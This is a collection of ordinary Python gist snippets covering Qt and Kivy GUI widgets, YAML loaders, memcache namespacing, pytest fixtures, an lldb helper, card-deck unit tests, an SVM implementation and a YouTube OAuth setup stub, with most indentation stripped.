(r"/(.+)", CommandControl)
], debug=True)
```
#### File: hard-gists/9110299/snippet.py
```python
__author__ = 'Alisue <<EMAIL>>'
try:
from PySide import QtCore
from PySide import QtGui
except ImportError:
from PyQt4 import QtCore
from PyQt4 import QtGui
def hex2QColor(c):
"""Convert Hex color to QColor"""
r=int(c[0:2],16)
g=int(c[2:4],16)
b=int(c[4:6],16)
return QtGui.QColor(r,g,b)
class RoundedWindow(QtGui.QWidget):
def __init__(self, parent=None):
super(RoundedWindow, self).__init__(parent)
# make the window frameless
self.setWindowFlags(QtCore.Qt.FramelessWindowHint)
self.setAttribute(QtCore.Qt.WA_TranslucentBackground)
self.backgroundColor = hex2QColor("efefef")
self.foregroundColor = hex2QColor("333333")
self.borderRadius = 5
self.draggable = True
self.dragging_threshould = 5
self.__mousePressPos = None
self.__mouseMovePos = None
layout = QtGui.QVBoxLayout(self)
layout.setContentsMargins(0, 0, 0, 0)
layout.setSpacing(0)
layout.addWidget(QtGui.QSizeGrip(self), 0,
QtCore.Qt.AlignBottom | QtCore.Qt.AlignRight)
self.setMinimumSize(320, 240)
def paintEvent(self, event):
# get current window size
s = self.size()
qp = QtGui.QPainter()
qp.begin(self)
qp.setRenderHint(QtGui.QPainter.Antialiasing, True)
qp.setPen(self.foregroundColor)
qp.setBrush(self.backgroundColor)
qp.drawRoundedRect(0, 0, s.width(), s.height(),
self.borderRadius, self.borderRadius)
qp.end()
def mousePressEvent(self, event):
if self.draggable and event.button() == QtCore.Qt.LeftButton:
self.__mousePressPos = event.globalPos() # global
self.__mouseMovePos = event.globalPos() - self.pos() # local
super(RoundedWindow, self).mousePressEvent(event)
def mouseMoveEvent(self, event):
if self.draggable and event.buttons() & QtCore.Qt.LeftButton:
globalPos = event.globalPos()
moved = globalPos - self.__mousePressPos
if moved.manhattanLength() > self.dragging_threshould:
# move when user drag window more than dragging_threshould
diff = globalPos - self.__mouseMovePos
self.move(diff)
self.__mouseMovePos = globalPos - self.pos()
super(RoundedWindow, self).mouseMoveEvent(event)
def mouseReleaseEvent(self, event):
if self.__mousePressPos is not None:
if event.button() == QtCore.Qt.LeftButton:
moved = event.globalPos() - self.__mousePressPos
if moved.manhattanLength() > self.dragging_threshould:
# do not call click event or so on
event.ignore()
self.__mousePressPos = None
super(RoundedWindow, self).mouseReleaseEvent(event)
# close event
if event.button() == QtCore.Qt.RightButton:
QtGui.qApp.exit()
if __name__ == '__main__':
import sys
app = QtGui.QApplication(sys.argv)
main = RoundedWindow()
main.show()
sys.exit(app.exec_())
```
#### File: hard-gists/9160719/snippet.py
```python
import sys
import os
import yaml
import json
class IncludeLoader(yaml.Loader):
"""
Custom YAML loader that adds an !include constructor for including
other YAML files relative to the current file being parsed.
Example:
section: !include other/file.yaml
"""
def __init__(self, stream):
self._root = os.path.abspath(os.path.split(stream.name)[0])
super(IncludeLoader, self).__init__(stream)
def include(self, node):
path = self.construct_scalar(node)
filename = path if path[0] == '/' else os.path.join(self._root, path)
with open(filename, 'r') as f:
return yaml.load(f, IncludeLoader)
IncludeLoader.add_constructor('!include', IncludeLoader.include)
def parse_yaml(template):
"""
Constructs a Packer JSON configuration file from the specified YAML
template and returns it as a string.
The YAML template format adds some flexibility and readability by
adding comments and an !include directive, allowing for the
following template syntax:
builders:
- !include build/ubuntu-12.04.kvm.yaml
- !include build/ubuntu-12.04.ami.yaml
provisioners:
- !include provision/ubuntu-12.04-base.yaml
- !include provision/ops-deploy.yaml
- !include provision/java7.yaml
- type: shell
script: app/setup.sh
In addition to the !include directive, the resulting YAML is
post-processed to flatten lists-of-lists in the top level sections,
allowing includes to contain lists of multiple entries (i.e. running
two shell scripts in a common provisioner.)
"""
with open(template, 'r') as infile:
parsed = yaml.load(infile, IncludeLoader)
# Flatten sections to allow including lists of steps in each include
for section in ('builders', 'provisioners', 'post-processors'):
if section in parsed:
parsed[section] = [f for l in [e if isinstance(e, list) else [e]
for e in parsed[section]] for f in l]
return json.dumps(parsed)
if __name__ == "__main__":
if len(sys.argv) < 2:
sys.stderr.write("ERROR: No template specified")
sys.exit(1)
if not os.path.exists(sys.argv[1]):
sys.stderr.write("ERROR: Template not found: %s" % sys.argv[1])
sys.exit(2)
sys.stdout.write(parse_yaml(sys.argv[1]))
```
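The lists-of-lists flattening that the docstring describes is packed into a single comprehension inside `parse_yaml`. Here is the same expression applied to a small made-up section, to make its effect concrete:

```python
# Same flattening expression as in parse_yaml(), run on sample data:
# an !include may expand to a list of steps, inline entries stay as dicts.
section = [
    [{'type': 'shell', 'script': 'a.sh'}, {'type': 'shell', 'script': 'b.sh'}],
    {'type': 'shell', 'script': 'app/setup.sh'},
]
flat = [f for l in [e if isinstance(e, list) else [e] for e in section] for f in l]
# flat == [{'type': 'shell', 'script': 'a.sh'},
#          {'type': 'shell', 'script': 'b.sh'},
#          {'type': 'shell', 'script': 'app/setup.sh'}]
```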
#### File: hard-gists/931406/snippet.py
```python
import memcache
import random
NS_KEY_RANGE_MAX = 1000000
mc = memcache.Client(['127.0.0.1:11211'], debug=0)
def clear_ns(ns):
mc.incr(_compute_ns_key(ns))
def _compute_key(key, ns=None):
if ns:
return '%s_%d_%s' % (ns, get_ns_key(ns), str(key),)
return key
def _compute_ns_key(ns):
return '%s_ns_key' % ns
def get(key, ns=None):
return mc.get(_compute_key(key, ns))
def get_ns_key(ns):
ns_key = mc.get(_compute_ns_key(ns))
if not ns_key:
ns_key = random.randint(1, NS_KEY_RANGE_MAX)
mc.set(_compute_ns_key(ns), ns_key)
return ns_key
def set(key, val, ns=None, **kwargs):
return mc.set(_compute_key(key, ns), val, **kwargs)
mc.flush_all()
assert get('blah') == None
set('blah', 2)
assert get('blah') == 2
assert get('blah', ns='foo') == None
set('blah', 8, ns='foo')
assert get('blah', ns='foo') == 8
assert get('blah') == 2
clear_ns('foo')
assert get('blah', ns='foo') == None
assert get('blah') == 2
```
#### File: hard-gists/932345/snippet.py
```python
from PIL import Image, ImageChops
def trim(im, border):
bg = Image.new(im.mode, im.size, border)
diff = ImageChops.difference(im, bg)
bbox = diff.getbbox()
if bbox:
return im.crop(bbox)
def create_thumbnail(path, size):
image = Image.open(path)
name, extension = path.split('.')
options = {}
if 'transparency' in image.info:
options['transparency'] = image.info["transparency"]
image.thumbnail((size, size), Image.ANTIALIAS)
image = trim(image, 255) ## Trim whitespace
image.save(name + '_new.' + extension, **options)
return image
```
#### File: hard-gists/9358479/snippet.py
```python
import os
from urllib.parse import urlparse
from flask.ext.migrate import upgrade
import pytest
from sqlalchemy import event
from sqlalchemy.orm import Session
from pygotham.core import db
from pygotham.factory import create_app
from tests import settings
@pytest.fixture(scope='session')
def app():
app = create_app(__name__, '', settings)
context = app.test_request_context()
context.push()
return app
@pytest.fixture(scope='session', autouse=True)
def setup_db(request, app):
db_name = urlparse(app.config['SQLALCHEMY_DATABASE_URI']).path[1:]
if os.system("psql -l | grep '{}'".format(db_name)) == 0:
assert not os.system('dropdb {}'.format(db_name))
assert not os.system('createdb -E utf-8 {}'.format(db_name))
upgrade()
@event.listens_for(Session, 'after_transaction_end')
def restart_savepoint(session, transaction):
if transaction.nested and not transaction._parent.nested:
session.begin_nested()
@pytest.fixture(autouse=True)
def dbsession(request):
request.addfinalizer(db.session.remove)
db.session.begin_nested()
```
#### File: hard-gists/94d747fe5180851196eb/snippet.py
```python
import yaml
from yaml.constructor import ConstructorError
try:
from yaml import CLoader as Loader
except ImportError:
from yaml import Loader
def no_duplicates_constructor(loader, node, deep=False):
"""Check for duplicate keys."""
mapping = {}
for key_node, value_node in node.value:
key = loader.construct_object(key_node, deep=deep)
value = loader.construct_object(value_node, deep=deep)
if key in mapping:
raise ConstructorError("while constructing a mapping", node.start_mark,
"found duplicate key (%s)" % key, key_node.start_mark)
mapping[key] = value
return loader.construct_mapping(node, deep)
yaml.add_constructor(yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG, no_duplicates_constructor)
# Works fine (no duplicate keys)
yaml_data = yaml.load('''
---
foo: bar
baz: qux
'''
)
# Works fine (no duplicate keys on the same level)
yaml_data = yaml.load('''
---
foo:
bar: baz
baz: qux
bar:
bar: baz
baz: qux
'''
)
# Raises exception (has duplicate keys)
yaml_data = yaml.load('''
---
foo: bar
foo: qux
'''
)
```
#### File: hard-gists/964472/snippet.py
```python
from django.conf import settings
from django.utils.importlib import import_module
from django.contrib.auth import SESSION_KEY, BACKEND_SESSION_KEY
def request_factory_login(factory, user, backend='django.contrib.auth.backends.ModelBackend'):
engine = import_module(settings.SESSION_ENGINE)
factory.session = engine.SessionStore()
factory.session[SESSION_KEY] = user.id
factory.session[BACKEND_SESSION_KEY] = backend
factory.session.save()
session_cookie = settings.SESSION_COOKIE_NAME
factory.cookies[session_cookie] = factory.session.session_key
```
#### File: hard-gists/9649532644540b5b798308f66699ef67/snippet.py
```python
import shlex
import lldb
import re
def breakonmethod(debugger, command, exe_ctx,result, internal_dict):
args=shlex.split(command)
Class=args[0]
Method=args[1]
ClassMethod = lldb.SBCommandReturnObject()
CMCommand='expr -- (IMP)method_getImplementation((Method)class_getClassMethod((Class)objc_getClass("{0}"),@selector({1})));'.format(Class,Method)
IMCommand='expr -- (IMP)method_getImplementation((Method)class_getInstanceMethod((Class)objc_getClass("{0}"),@selector({1})));'.format(Class,Method)
debugger.GetCommandInterpreter().HandleCommand(CMCommand, ClassMethod)
InstanceMethod =lldb.SBCommandReturnObject()
debugger.GetCommandInterpreter().HandleCommand(IMCommand,InstanceMethod)
CMObj=ClassMethod.GetOutput()
IMObj=InstanceMethod.GetOutput()
CMObj=re.search(r'0x([a-zA-Z0-9]|x)*', CMObj).group(0)
IMObj=re.search(r'0x([a-zA-Z0-9]|x)*', IMObj).group(0)
CMObj=int(CMObj, 16)
IMObj=int(IMObj, 16)
ADDR=max(CMObj,IMObj)
debugger.HandleCommand("breakpoint set -a %i"%ADDR)
def __lldb_init_module (debugger, dict):
#Avoid Name Collision
debugger.HandleCommand('command script add -f BreakMessage.breakonmethod bom')
```
#### File: hard-gists/9655195/snippet.py
```python
from kivy.uix.widget import Widget
from kivy.uix.label import Label
from kivy.uix.behaviors import ButtonBehavior
from kivy.lang import Builder
from kivy.clock import Clock
from kivy.animation import Animation
from kivy.properties import (
NumericProperty, ListProperty, ObjectProperty, DictProperty)
from kivy.app import App
from functools import partial
from copy import copy
KV = '''
#:import pi math.pi
#:import cos math.cos
#:import sin math.sin
#:import V kivy.vector.Vector
<ModernMenu>:
canvas.before:
Color:
rgba: 1, 0, 0, .4
Ellipse:
pos: self.center_x - self.radius, self.center_y - self.radius
size: self.radius * 2, self.radius * 2
angle_start: 0
angle_end: self.circle_progress * 360 * self.creation_direction
Color:
rgba: self.color
Line:
circle:
(
self.center_x, self.center_y,
self.radius, 0, self.circle_progress * 360 * self.creation_direction
)
width: self.line_width
on_touch_down:
V(args[1].pos).distance(self.center) < self.radius and (
self.back() if self.choices_history else self.dismiss())
<ModernMenuLabel>:
size: self.texture_size
padding: 5, 5
on_press: self.callback and self.callback(self)
canvas.before:
Color:
rgba: .1, .4, .4, .9
Rectangle:
pos: self.pos
size: self.size
Line:
points:
(
self.center_x, self.center_y,
self.parent.center_x + cos(
self.opacity * self.index * 2 * pi / self.siblings
) * self.parent.radius,
self.parent.center_y + sin(
self.opacity * self.index * 2 * pi / self.siblings
) * self.parent.radius
) if self.parent else []
width: self.parent.line_width if self.parent else 1
center:
(
self.parent.center_x +
cos(self.opacity * self.index * 2 * pi / self.siblings) * self.radius,
self.parent.center_y +
sin(self.opacity * self.index * 2 * pi / self.siblings) * self.radius
) if (self.size and self.parent and self.parent.children) else (0, 0)
'''
def dist((x1, y1), (x2, y2)):
return ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** .5
class ModernMenuLabel(ButtonBehavior, Label):
index = NumericProperty(0)
radius = NumericProperty(100)
siblings = NumericProperty(1)
callback = ObjectProperty(None)
def on_parent(self, *args):
if self.parent:
self.parent.bind(children=self.update_siblings)
def update_siblings(self, *args):
if self.parent:
self.siblings = max(0, len(self.parent.children))
else:
self.siblings = 1
class ModernMenu(Widget):
radius = NumericProperty(50)
circle_width = NumericProperty(5)
line_width = NumericProperty(2)
color = ListProperty([.3, .3, .3, 1])
circle_progress = NumericProperty(0)
creation_direction = NumericProperty(1)
creation_timeout = NumericProperty(1)
choices = ListProperty([])
item_cls = ObjectProperty(ModernMenuLabel)
item_args = DictProperty({'opacity': 0})
animation = ObjectProperty(Animation(opacity=1, d=.5))
choices_history = ListProperty([])
def start_display(self, touch):
touch.grab(self)
a = Animation(circle_progress=1, d=self.creation_timeout)
a.bind(on_complete=self.open_menu)
touch.ud['animation'] = a
a.start(self)
def open_menu(self, *args):
self.clear_widgets()
for i in self.choices:
kwargs = copy(self.item_args)
kwargs.update(i)
ml = self.item_cls(**kwargs)
self.animation.start(ml)
self.add_widget(ml)
def open_submenu(self, choices, *args):
self.choices_history.append(self.choices)
self.choices = choices
self.open_menu()
def back(self, *args):
self.choices = self.choices_history.pop()
self.open_menu()
def on_touch_move(self, touch, *args):
if (
touch.grab_current == self and
dist(touch.pos, touch.opos) > self.radius and
self.parent and
self.circle_progress < 1
):
self.parent.remove_widget(self)
return super(ModernMenu, self).on_touch_move(touch, *args)
def on_touch_up(self, touch, *args):
if (
touch.grab_current == self and
self.parent and
self.circle_progress < 1
):
self.parent.remove_widget(self)
return super(ModernMenu, self).on_touch_up(touch, *args)
def dismiss(self):
a = Animation(opacity=0)
a.bind(on_complete=self._remove)
a.start(self)
def _remove(self, *args):
if self.parent:
self.parent.remove_widget(self)
class MenuSpawner(Widget):
timeout = NumericProperty(0.1)
menu_cls = ObjectProperty(ModernMenu)
cancel_distance = NumericProperty(10)
menu_args = DictProperty({})
def on_touch_down(self, touch, *args):
t = partial(self.display_menu, touch)
touch.ud['menu_timeout'] = t
Clock.schedule_once(t, self.timeout)
return super(MenuSpawner, self).on_touch_down(touch, *args)
def on_touch_move(self, touch, *args):
if (
touch.ud['menu_timeout'] and
dist(touch.pos, touch.opos) > self.cancel_distance
):
Clock.unschedule(touch.ud['menu_timeout'])
return super(MenuSpawner, self).on_touch_move(touch, *args)
def on_touch_up(self, touch, *args):
if touch.ud.get('menu_timeout'):
Clock.unschedule(touch.ud['menu_timeout'])
return super(MenuSpawner, self).on_touch_up(touch, *args)
def display_menu(self, touch, dt):
menu = self.menu_cls(center=touch.pos, **self.menu_args)
self.add_widget(menu)
menu.start_display(touch)
Builder.load_string(KV)
TESTAPP_KV = '''
FloatLayout:
ScrollView:
BoxLayout:
orientation: 'vertical'
size_hint_y: None
height: 1000
Button:
text: 'test1'
Label:
text: 'label1'
Button:
text: 'test2'
Label:
text: 'label2'
Button:
text: 'test3'
Label:
text: 'label3'
MenuSpawner:
timeout: .8
menu_args:
dict(
creation_direction=-1,
radius=30,
creation_timeout=.4,
choices=[
dict(text='submenu 1', index=1, callback=app.callback1),
dict(text='action 1', index=2, callback=app.callback2),
dict(text='action 2', index=3, callback=app.callback3),
dict(text='submenu 2', index=4, callback=app.callback4),
dict(text='action 3', index=5, callback=app.callback5),
])
'''
class ModernMenuApp(App):
def build(self):
return Builder.load_string(TESTAPP_KV)
def callback1(self, *args):
print "test 1"
args[0].parent.open_submenu(
choices=[
dict(text='action 1', index=1, callback=self.callback2),
dict(text='action 2', index=2, callback=self.callback2),
dict(text='action 3', index=3, callback=self.callback2),
])
def callback2(self, *args):
print "test 2"
args[0].parent.dismiss()
def callback3(self, *args):
print "test 3"
args[0].parent.dismiss()
def callback4(self, *args):
print "test 4"
args[0].parent.open_submenu(
choices=[
dict(text='hey', index=1, callback=self.callback2),
dict(text='oh', index=2, callback=self.callback2),
])
def callback5(self, *args):
print "test 5"
args[0].parent.dismiss()
if __name__ == '__main__':
ModernMenuApp().run()
```
#### File: hard-gists/9750796/snippet.py
```python
import numpy as np
import marisa_trie
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.externals import six
class MarisaCountVectorizer(CountVectorizer):
# ``CountVectorizer.fit`` method calls ``fit_transform`` so
# ``fit`` is not provided
def fit_transform(self, raw_documents, y=None):
X = super(MarisaCountVectorizer, self).fit_transform(raw_documents)
X = self._freeze_vocabulary(X)
return X
def _freeze_vocabulary(self, X=None):
if not self.fixed_vocabulary_:
frozen = marisa_trie.Trie(six.iterkeys(self.vocabulary_))
if X is not None:
X = self._reorder_features(X, self.vocabulary_, frozen)
self.vocabulary_ = frozen
self.fixed_vocabulary_ = True
del self.stop_words_
return X
def _reorder_features(self, X, old_vocabulary, new_vocabulary):
map_index = np.empty(len(old_vocabulary), dtype=np.int32)
for term, new_val in six.iteritems(new_vocabulary):
map_index[new_val] = old_vocabulary[term]
return X[:, map_index]
```
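The class above swaps the dict vocabulary for a `marisa_trie.Trie` after fitting, which is where the memory saving comes from. A minimal usage sketch, assuming `marisa-trie` and scikit-learn are installed; the toy corpus is invented for illustration:
```python
# Hypothetical smoke test: fit on a tiny corpus and confirm the vocabulary
# has been frozen into a marisa_trie.Trie instead of a plain dict.
corpus = [
    "the quick brown fox jumps over the lazy dog",
    "never jump over the lazy dog quickly",
]

vec = MarisaCountVectorizer()
X = vec.fit_transform(corpus)
print(type(vec.vocabulary_))   # marisa_trie.Trie
print(X.shape)                 # (2, number of distinct tokens)
```
On a large corpus the frozen trie is typically much smaller than the equivalent dict vocabulary, at the cost of slightly slower lookups.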
#### File: hard-gists/9773143/snippet.py
```python
import unittest
import collections
from solution import (RANKS, SUITS, Card, CardCollection,
StandardDeck, SixtySixDeck, BeloteDeck)
class RankTest(unittest.TestCase):
def setUp(self):
self.rank_string = 'Three'
self.rank = RANKS[self.rank_string]()
def test_creation(self):
        self.assertEqual(self.rank.__class__.__name__, self.rank_string)
def test_equality_for_identical_ranks(self):
rank_copy = RANKS[self.rank_string]()
self.assertEqual(rank_copy, self.rank)
def test_equality_for_diffent_ranks(self):
different_rank = RANKS['Four']()
self.assertNotEqual(different_rank, self.rank)
def test_stringify(self):
self.assertEqual(self.rank_string, str(self.rank))
def test_symbol_is_there(self):
self.assertEqual(self.rank.symbol, '3')
class SuitTest(unittest.TestCase):
def setUp(self):
self.suit_string = 'Diamonds'
self.suit = SUITS[self.suit_string]()
def test_creation(self):
        self.assertEqual(self.suit.__class__.__name__, self.suit_string)
def test_equality_for_identical_suits(self):
suit_copy = SUITS[self.suit_string]()
self.assertEqual(suit_copy, self.suit)
def test_equality_for_diffent_suits(self):
different_suit = SUITS['Hearts']()
self.assertNotEqual(different_suit, self.suit)
def test_stringify(self):
self.assertEqual(self.suit_string, str(self.suit))
def test_color_is_there(self):
self.assertEqual(self.suit.color, 'red')
class CardTest(unittest.TestCase):
def setUp(self):
self.rank = RANKS['Ace']
self.suit = SUITS['Spades']
self.card = Card(self.rank, self.suit)
def test_equality_for_identical_cards(self):
self.assertEqual(self.card, Card(self.rank, self.suit))
def test_equality_for_different_cards(self):
different_card = Card(RANKS['Queen'], SUITS['Diamonds'])
self.assertNotEqual(different_card, self.card)
def test_stringify(self):
self.assertEqual(str(self.card), 'Ace of Spades')
class CardCollectionTest(unittest.TestCase):
def setUp(self):
self.collection = [Card(RANKS['Ace'], SUITS['Diamonds']),
Card(RANKS['Queen'], SUITS['Spades']),
Card(RANKS['Two'], SUITS['Hearts']),
Card(RANKS['Seven'], SUITS['Spades']),
Card(RANKS['Ace'], SUITS['Diamonds']), ]
self.deck = CardCollection(self.collection)
def test_top_card_returns_the_top_card(self):
self.assertEqual(self.collection[-1], self.deck.top_card())
def test_bottom_card_returns_the_bottom_card(self):
self.assertEqual(self.collection[0], self.deck.bottom_card())
def test_add_card_appends_card_to_deck(self):
added_card = Card(RANKS['King'], SUITS['Diamonds'])
self.deck.add(added_card)
self.assertEqual(self.deck.top_card(), added_card)
def test_draw_from_top_removes_top_card_and_returns_it(self):
self.assertEqual(self.deck.draw_from_top(), self.collection[-1])
self.assertEqual(self.collection[-2], self.deck.top_card())
def test_draw_from_bottom_removes_bottom_card_and_returns_it(self):
self.assertEqual(self.deck.draw_from_bottom(), self.collection[0])
self.assertEqual(self.collection[1], self.deck.bottom_card())
def test_index_returns_index_of_card(self):
self.assertEqual(self.deck.index(self.collection[3]), 3)
def test_index_return_first_occurences_of_card(self):
self.assertEqual(self.deck.index(self.collection[4]), 0)
def test_index_throws_value_error_if_item_is_missing(self):
missing_card = Card(RANKS['Five'], SUITS['Spades'])
self.assertRaises(ValueError, self.deck.index, missing_card)
def test_is_iterable(self):
self.assertIsInstance(self.deck, collections.Iterable)
def test_is_indexable(self):
self.assertTrue('__getitem__' in dir(self.deck))
class StandardDecksTest(unittest.TestCase):
def generate_list_of_cards(self, ranks):
return []
def test_standard_deck(self):
standard_deck = ['King of Diamonds',
'Queen of Diamonds',
'Jack of Diamonds',
'Ten of Diamonds',
'Nine of Diamonds',
'Eight of Diamonds',
'Seven of Diamonds',
'Six of Diamonds',
'Five of Diamonds',
'Four of Diamonds',
'Three of Diamonds',
'Two of Diamonds',
'Ace of Diamonds',
'King of Clubs',
'Queen of Clubs',
'Jack of Clubs',
'Ten of Clubs',
'Nine of Clubs',
'Eight of Clubs',
'Seven of Clubs',
'Six of Clubs',
'Five of Clubs',
'Four of Clubs',
'Three of Clubs',
'Two of Clubs',
'Ace of Clubs',
'King of Hearts',
'Queen of Hearts',
'Jack of Hearts',
'Ten of Hearts',
'Nine of Hearts',
'Eight of Hearts',
'Seven of Hearts',
'Six of Hearts',
'Five of Hearts',
'Four of Hearts',
'Three of Hearts',
'Two of Hearts',
'Ace of Hearts',
'King of Spades',
'Queen of Spades',
'Jack of Spades',
'Ten of Spades',
'Nine of Spades',
'Eight of Spades',
'Seven of Spades',
'Six of Spades',
'Five of Spades',
'Four of Spades',
'Three of Spades',
'Two of Spades',
'Ace of Spades']
self.assertSequenceEqual([str(card) for card in StandardDeck()],
standard_deck)
def test_belote_deck(self):
belotte_deck = ['King of Diamonds',
'Queen of Diamonds',
'Jack of Diamonds',
'Ten of Diamonds',
'Nine of Diamonds',
'Eight of Diamonds',
'Seven of Diamonds',
'Ace of Diamonds',
'King of Clubs',
'Queen of Clubs',
'Jack of Clubs',
'Ten of Clubs',
'Nine of Clubs',
'Eight of Clubs',
'Seven of Clubs',
'Ace of Clubs',
'King of Hearts',
'Queen of Hearts',
'Jack of Hearts',
'Ten of Hearts',
'Nine of Hearts',
'Eight of Hearts',
'Seven of Hearts',
'Ace of Hearts',
'King of Spades',
'Queen of Spades',
'Jack of Spades',
'Ten of Spades',
'Nine of Spades',
'Eight of Spades',
'Seven of Spades',
'Ace of Spades']
self.assertSequenceEqual([str(card) for card in BeloteDeck()],
belotte_deck)
def test_sixtysix_deck(self):
sixtysix_deck = ['King of Diamonds',
'Queen of Diamonds',
'Jack of Diamonds',
'Ten of Diamonds',
'Nine of Diamonds',
'Ace of Diamonds',
'King of Clubs',
'Queen of Clubs',
'Jack of Clubs',
'Ten of Clubs',
'Nine of Clubs',
'Ace of Clubs',
'King of Hearts',
'Queen of Hearts',
'Jack of Hearts',
'Ten of Hearts',
'Nine of Hearts',
'Ace of Hearts',
'King of Spades',
'Queen of Spades',
'Jack of Spades',
'Ten of Spades',
'Nine of Spades',
'Ace of Spades']
self.assertSequenceEqual([str(card) for card in SixtySixDeck()],
sixtysix_deck)
if __name__ == '__main__':
unittest.main()
```
#### File: hard-gists/977777/snippet.py
```python
from twisted.internet import reactor, defer
class Api:
def __init__(self):
self.domainObjects = None
self.subscribers = []
def test(self, url):
# code for doing the async stuff here
d = defer.Deferred()
d.addCallback(self.asyncFinishedHandler)
reactor.callLater(3, d.callback, 100)
def asyncFinishedHandler(self, response):
# parse response into domain objects
parseResults = self.parse(response)
self.domainObjects = parseResults
self.__raiseDoneEvent()
def __raiseDoneEvent(self):
for s in self.subscribers:
s()
def parse(self, response):
return response
def subscribeToDoneEvent(self, subscriber):
self.subscribers.append(subscriber)
def main():
a = Api()
def doneEventHandler():
print a.domainObjects
a.subscribeToDoneEvent(doneEventHandler)
a.test("something")
reactor.callLater(4, reactor.stop)
reactor.run()
if __name__ == "__main__":
main()
```
#### File: hard-gists/97cffbea574a5890f0d7/snippet.py
```python
import numpy as np
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.utils import check_random_state
from sklearn.preprocessing import LabelEncoder
def projection_simplex(v, z=1):
"""
Projection onto the simplex:
w^* = argmin_w 0.5 ||w-v||^2 s.t. \sum_i w_i = z, w_i >= 0
"""
# For other algorithms computing the same projection, see
# https://gist.github.com/mblondel/6f3b7aaad90606b98f71
n_features = v.shape[0]
u = np.sort(v)[::-1]
cssv = np.cumsum(u) - z
ind = np.arange(n_features) + 1
cond = u - cssv / ind > 0
rho = ind[cond][-1]
theta = cssv[cond][-1] / float(rho)
w = np.maximum(v - theta, 0)
return w
class MulticlassSVM(BaseEstimator, ClassifierMixin):
def __init__(self, C=1, max_iter=50, tol=0.05,
random_state=None, verbose=0):
self.C = C
self.max_iter = max_iter
        self.tol = tol
self.random_state = random_state
self.verbose = verbose
def _partial_gradient(self, X, y, i):
# Partial gradient for the ith sample.
g = np.dot(X[i], self.coef_.T) + 1
g[y[i]] -= 1
return g
def _violation(self, g, y, i):
# Optimality violation for the ith sample.
smallest = np.inf
for k in range(g.shape[0]):
if k == y[i] and self.dual_coef_[k, i] >= self.C:
continue
elif k != y[i] and self.dual_coef_[k, i] >= 0:
continue
smallest = min(smallest, g[k])
return g.max() - smallest
def _solve_subproblem(self, g, y, norms, i):
# Prepare inputs to the projection.
Ci = np.zeros(g.shape[0])
Ci[y[i]] = self.C
beta_hat = norms[i] * (Ci - self.dual_coef_[:, i]) + g / norms[i]
z = self.C * norms[i]
# Compute projection onto the simplex.
beta = projection_simplex(beta_hat, z)
return Ci - self.dual_coef_[:, i] - beta / norms[i]
def fit(self, X, y):
n_samples, n_features = X.shape
# Normalize labels.
self._label_encoder = LabelEncoder()
y = self._label_encoder.fit_transform(y)
# Initialize primal and dual coefficients.
n_classes = len(self._label_encoder.classes_)
self.dual_coef_ = np.zeros((n_classes, n_samples), dtype=np.float64)
self.coef_ = np.zeros((n_classes, n_features))
# Pre-compute norms.
norms = np.sqrt(np.sum(X ** 2, axis=1))
# Shuffle sample indices.
rs = check_random_state(self.random_state)
ind = np.arange(n_samples)
rs.shuffle(ind)
violation_init = None
for it in range(self.max_iter):
violation_sum = 0
for ii in range(n_samples):
i = ind[ii]
# All-zero samples can be safely ignored.
if norms[i] == 0:
continue
g = self._partial_gradient(X, y, i)
v = self._violation(g, y, i)
violation_sum += v
if v < 1e-12:
continue
# Solve subproblem for the ith sample.
delta = self._solve_subproblem(g, y, norms, i)
# Update primal and dual coefficients.
self.coef_ += (delta * X[i][:, np.newaxis]).T
self.dual_coef_[:, i] += delta
if it == 0:
violation_init = violation_sum
vratio = violation_sum / violation_init
if self.verbose >= 1:
print("iter", it + 1, "violation", vratio)
if vratio < self.tol:
if self.verbose >= 1:
print("Converged")
break
return self
def predict(self, X):
decision = np.dot(X, self.coef_.T)
pred = decision.argmax(axis=1)
return self._label_encoder.inverse_transform(pred)
if __name__ == '__main__':
from sklearn.datasets import load_iris
iris = load_iris()
X, y = iris.data, iris.target
clf = MulticlassSVM(C=0.1, tol=0.01, max_iter=100, random_state=0, verbose=1)
clf.fit(X, y)
print(clf.score(X, y))
```
#### File: hard-gists/982ce339d5f8c9a769a0/snippet.py
```python
import random

import pandas as pd
import numpy as np
from sklearn.feature_extraction import DictVectorizer
def encode_onehot(df, cols):
"""
One-hot encoding is applied to columns specified in a pandas DataFrame.
Modified from: https://gist.github.com/kljensen/5452382
Details:
http://en.wikipedia.org/wiki/One-hot
http://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.OneHotEncoder.html
@param df pandas DataFrame
@param cols a list of columns to encode
@return a DataFrame with one-hot encoding
"""
vec = DictVectorizer()
vec_data = pd.DataFrame(vec.fit_transform(df[cols].to_dict(outtype='records')).toarray())
vec_data.columns = vec.get_feature_names()
vec_data.index = df.index
df = df.drop(cols, axis=1)
df = df.join(vec_data)
return df
def main():
np.random.seed(42)
df = pd.DataFrame(np.random.randn(25, 3), columns=['a', 'b', 'c'])
# Make some random categorical columns
df['e'] = [random.choice(('Chicago', 'Boston', 'New York')) for i in range(df.shape[0])]
df['f'] = [random.choice(('Chrome', 'Firefox', 'Opera', "Safari")) for i in range(df.shape[0])]
# Vectorize the categorical columns: e & f
df = encode_onehot(df, cols=['e', 'f'])
print df.head()
if __name__ == '__main__':
main()
```
#### File: hard-gists/9874480/snippet.py
```python
import httplib2
import os
import sys
from apiclient.discovery import build
# from apiclient.errors import HttpError
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
from oauth2client.tools import run
from urlparse import urlparse, parse_qs
import re
from docopt import docopt
import fileinput
# The CLIENT_SECRETS_FILE variable specifies the name of a file that contains
# the OAuth 2.0 information for this application, including its client_id and
# client_secret. You can acquire an OAuth 2.0 client ID and client secret from
# the Google Cloud Console at
# https://cloud.google.com/console.
# Please ensure that you have enabled the YouTube Data API for your project.
# For more information about using OAuth2 to access the YouTube Data API, see:
# https://developers.google.com/youtube/v3/guides/authentication
# For more information about the client_secrets.json file format, see:
# https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
CLIENT_SECRETS_FILE = "client_secrets.json"
# This variable defines a message to display if the CLIENT_SECRETS_FILE is
# missing.
MISSING_CLIENT_SECRETS_MESSAGE = """
WARNING: Please configure OAuth 2.0
To make this sample run you will need to populate the client_secrets.json file
found at:
%s
with information from the Cloud Console
https://cloud.google.com/console
For more information about the client_secrets.json file format, please visit:
https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
""" % os.path.abspath(os.path.join(os.path.dirname(__file__),
CLIENT_SECRETS_FILE))
